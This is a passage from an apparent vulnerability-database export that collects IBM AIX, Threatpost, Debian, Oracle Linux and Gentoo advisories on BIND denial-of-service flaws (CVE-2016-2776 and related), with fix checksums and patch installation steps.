7100-03-05.\n\n VIOS Level Interim Fix (*.Z) KEY\n -----------------------------------------------\n 2.2.3.70 IV89828m7a.161013.epkg.Z key_w_fix\n 2.2.4.2x IV89828m7a.161013.epkg.Z key_w_fix\n \n The above fixes are cumulative and address previously issued\n AIX BIND security bulletins with respect to SP and TL. 
\n\n To extract the fixes from the tar file:\n\n tar xvf bind_fix13.tar\n cd bind_fix13 \n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 <filename>\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n d8429569f694cb01028ca64ca7a015429186f68446b56f1270889ae35ec1997f IV89828m5a.161017.epkg.Z key_w_csum\n d30c22257611a99f9b7245afec9ef6aa40059fcc93f26e7dcffa2ab356436db2 IV89828m6a.161013.epkg.Z key_w_csum\n 9e17c96c2130df27da3a78be4d39c6940d824352f20cf0ea43c088bd189a46c0 IV89828m7a.161013.epkg.Z key_w_csum\n e1cf3b152a9aa4e7d5e96f09b71a3b1eca8e70e7f163ca40c758aef0a8002c04 IV89829m1a.161013.epkg.Z key_w_csum\n 838888c98f1c35a023d9f9337d47742abc190dba37ba26a71838ed6ad61ee1d4 IV89829m2a.161010.epkg.Z key_w_csum\n 2bfc5500f33244a26bcf7406b80efdcfc75610db12527b7d8c3292c7d857c134 IV89830m5a.161010.epkg.Z key_w_csum\n e6924e936d92a22a94ce0e3b51945dd135b0423fdbf45bbf6d05305bf6ff2a52 IV89830m6d.161012.epkg.Z key_w_csum\n 33054b9232f5c573dea6f869d2a7228a41764211036f5840adb766b9d3af9177 IV89830m7a.161013.epkg.Z key_w_csum\n d6b966d566e8e2d94e510774c2315ff751559c3f5352d2ba3cdbbec2aa61779f IV89831m1a.161017.epkg.Z key_w_csum\n 083aadd6c370c678818b320c88c6d8fd40d59e95b4f921c287ef6583649892bc IV89831m2a.161018.epkg.Z key_w_csum\n 55d7e325b63512056976f0cc951c7ebaf96b0f4703c5223f869ce42cb7af5d9c IV90056m9a.161020.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. 
If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n https://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e epkg_name -p # where epkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e epkg_name -X # where epkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to 
receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\nhttps://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Fri Nov 18 08:19:36 CST 2016\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. 
\n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n\n", "edition": 17, "modified": "2016-11-18T08:19:36", "published": "2016-11-18T08:19:36", "id": "BIND_ADVISORY13.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc", "title": "Vulnerabilities in BIND impact AIX,Vulnerabilities in BIND impact VIOS", "type": "aix", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:41", "bulletinFamily": "info", "cvelist": ["CVE-2016-2775", "CVE-2016-2776"], "description": "The Internet Systems Consortium patched the BIND domain name system this week, addressing what it calls a critical error condition in the software.\n\nA [security advisory](<https://kb.isc.org/article/AA-01419/74/CVE-2016-2776%3A-Assertion-Failure-in-buffer.c-While-Building-Responses-to-a-Specifically-Constructed-Request.html>) on ISC\u2019s Knowledge Base on Tuesday acknowledges an attacker can exploit the vulnerability remotely and likely for that reason, marks the issue as high severity.\n\nThe issue stems from a defect in the rendering of messages into packets when a nameserver is constructing a response, according to the ISC, which has maintained BIND since 2000.\n\nThe bug affects a handful of versions of the software, including versions 9.0.x to 9.8.x, 9.9.0 to 9.9.9-P2, 9.9.3-S1 to 9.9.9-S3, 9.10.0 to 9.10.4-P2, and 9.11.0a1 to 9.11.0rc1.\n\nIf exploited, the vulnerability can lead to \u201can assertion failure in buffer.c while 
constructing a response to a query that meets certain criteria,\u201d ISC warns, adding that it can be triggered \u201ceven if the apparent source address isn\u2019t allowed to make queries (i.e. doesn\u2019t match \u2018allow-query\u2019).\u201d\n\nWhile the ISC claims the vulnerability isn\u2019t being exploited in the wild, it\u2019s still cautioning that all servers, assuming they can receive request packets from any source, are vulnerable.\n\nUsers running BIND 9 are being urged to update to either version 9.9.9-P3, version 9.10.4-P3, or version 9.11.0rc3 \u2013 whichever release matches closest to their current version.\n\nBIND is easily the most ubiquitous Domain Name System (DNS) software deployed on the Internet. Despite being so widespread, this is only the seventh vulnerability identified in the software so far this year. Before this, the most recent issue, [which surfaced in July](<https://kb.isc.org/article/AA-01393/74/CVE-2016-2775%3A-A-query-name-which-is-too-long-can-cause-a-segmentation-fault-in-lwresd.html>), revolved around a less pressing error that could have led to a denial of service condition in BIND\u2019s implementation of the lightweight resolver protocol.\n", "modified": "2016-09-29T18:08:23", "published": "2016-09-28T16:29:53", "id": "THREATPOST:D7A38F9093BCFFE3B9F1544BCF241462", "href": "https://threatpost.com/isc-patches-critical-error-condition-in-bind/120940/", "type": "threatpost", "title": "ISC Patches Critical Error Condition in BIND", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:23:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2775", "CVE-2016-2776"], "description": "Package : bind9\nVersion : 1:9.8.4.dfsg.P1-6+nmu2+deb7u11\nCVE ID : CVE-2016-2775 CVE-2016-2776\nDebian Bug : 831796 839010\n\nCVE-2016-2775\n\n lwresd crash with long query name\n Backport of upstream commit 38cc2d14e218e536e0102fa70deef99461354232.\n\nCVE-2016-2776\n\n 
assertion failure due to unspecified crafted query\n Fix based on 43139-9-9.patch from ISC.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n1:9.8.4.dfsg.P1-6+nmu2+deb7u11.\n\nWe recommend that you upgrade your bind9 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2016-10-05T17:45:24", "published": "2016-10-05T17:45:24", "id": "DEBIAN:DLA-645-1:784F3", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201610/msg00001.html", "title": "[SECURITY] [DLA 645-1] bind9 security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-12T01:00:02", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2775", "CVE-2016-2776"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3680-1 security@debian.org\nhttps://www.debian.org/security/ Florian Weimer\nSeptember 27, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bind9\nCVE ID : CVE-2016-2775 CVE-2016-2776\nDebian Bug : 831796 839010\n\nTwo vulnerabilities were reported in BIND, a DNS server.\n\nCVE-2016-2775\n\n The lwresd component in BIND (which is not enabled by default)\n could crash while processing an overlong request name. This could\n lead to a denial of service.\n\nCVE-2016-2776\n\n A crafted query could crash the BIND name server daemon, leading\n to a denial of service. 
All server roles (authoritative,\n recursive and forwarding) in default configurations are\n affected.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:9.9.5.dfsg-9+deb8u7.\n\nWe recommend that you upgrade your bind9 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2016-09-27T18:52:39", "published": "2016-09-27T18:52:39", "id": "DEBIAN:DSA-3680-1:5E275", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00260.html", "title": "[SECURITY] [DSA 3680-1] bind9 security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-8000", "CVE-2016-8864", "CVE-2016-1285", "CVE-2016-2776"], "description": "[32:9.9.4-38]\n- Fix CVE-2016-8864\n[32:9.9.4-37]\n- Fix CVE-2016-2776\n[32:9.9.4-36]\n- Added automatic interface scan functionality (#1294506)\n- Removed NetworkManager dispatcher script since it is not needed any more (#1294506)\n[32:9.9.4-35]\n- Added GeoIP support (#1220594)\n[32:9.9.4-34]\n- Added support for CAA records (#1306610)\n- Use HTTPS URL instead of FTP for upstream sources (#1319280)\n[32:9.9.4-33]\n- Fix excessive queries caused by DS chasing with stub zones when DNSSEC is not used (#1291185)\n- Fix error in internal test suite (#1259514)\n- Fix named-checkconf call in *-chroot.service files (#1278082)\n- Fix incorrect path in BIND sample configuration and added comment to default configuration (#1247502)\n[32:9.9.4-32]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.9.4-31]\n- Fix CVE-2015-8704\n[32:9.9.4-30]\n- Fix CVE-2015-8000", "edition": 4, "modified": "2016-11-09T00:00:00", 
"published": "2016-11-09T00:00:00", "id": "ELSA-2016-2615", "href": "http://linux.oracle.com/errata/ELSA-2016-2615.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:26", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-5477", "CVE-2015-8000", "CVE-2015-5722", "CVE-2016-1285", "CVE-2016-2776", "CVE-2014-8500"], "description": "[32:9.7.0-21.P2.7]\n- Fix CVE-2016-2776\n[32:9.7.0-21.P2.6]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.7.0-21.P2.5]\n- Fix CVE-2015-8704\n[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "edition": 4, "modified": "2016-09-28T00:00:00", "published": "2016-09-28T00:00:00", "id": "ELSA-2016-1945", "href": "http://linux.oracle.com/errata/ELSA-2016-1945.html", "title": "bind97 security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:09", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-5477", "CVE-2015-8000", "CVE-2015-5722", "CVE-2016-1285", "CVE-2016-2776", "CVE-2014-8500"], "description": "[30:9.3.6-25.P1.9]\n- Fix CVE-2016-2776\n[30:9.3.6-25.P1.8]\n- Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n[30:9.3.6-25.P1.7]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[30:9.3.6-25.P1.6]\n- Fix CVE-2015-8704\n[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "edition": 4, "modified": "2016-09-28T00:00:00", "published": "2016-09-28T00:00:00", "id": "ELSA-2016-1944", "href": "http://linux.oracle.com/errata/ELSA-2016-1944.html", "title": "bind security 
update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-5477", "CVE-2015-8000", "CVE-2016-2848", "CVE-2015-5722", "CVE-2016-1285", "CVE-2016-2776", "CVE-2014-8500"], "description": "[32:9.7.0-21.P2.8]\n- Fix CVE-2016-2848\n[32:9.7.0-21.P2.7]\n- Fix CVE-2016-2776\n[32:9.7.0-21.P2.6]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.7.0-21.P2.5]\n- Fix CVE-2015-8704\n[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "edition": 4, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "ELSA-2016-2094", "href": "http://linux.oracle.com/errata/ELSA-2016-2094.html", "title": "bind97 security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:44", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-5477", "CVE-2015-8000", "CVE-2016-2848", "CVE-2015-5722", "CVE-2016-1285", "CVE-2016-2776", "CVE-2014-8500"], "description": "[30:9.3.6-25.P1.10]\n- Fix CVE-2016-2848\n[30:9.3.6-25.P1.9]\n- Fix CVE-2016-2776\n[30:9.3.6-25.P1.8]\n- Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n[30:9.3.6-25.P1.7]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[30:9.3.6-25.P1.6]\n- Fix CVE-2015-8704\n[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "edition": 4, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "ELSA-2016-2093", "href": "http://linux.oracle.com/errata/ELSA-2016-2093.html", "title": "bind security update", "type": 
"oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2016-10-12T00:53:27", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2016-2088", "CVE-2016-6170", "CVE-2015-8705", "CVE-2016-2775", "CVE-2016-1285", "CVE-2016-2776"], "edition": 1, "description": "### Background\n\nBIND (Berkeley Internet Name Domain) is a Name Server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in BIND. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could cause a Denial of Service condition through multiple attack vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll BIND users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/bind-9.10.4_p3\"", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "GLSA-201610-07", "href": "https://security.gentoo.org/glsa/201610-07", "type": "gentoo", "title": "BIND: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}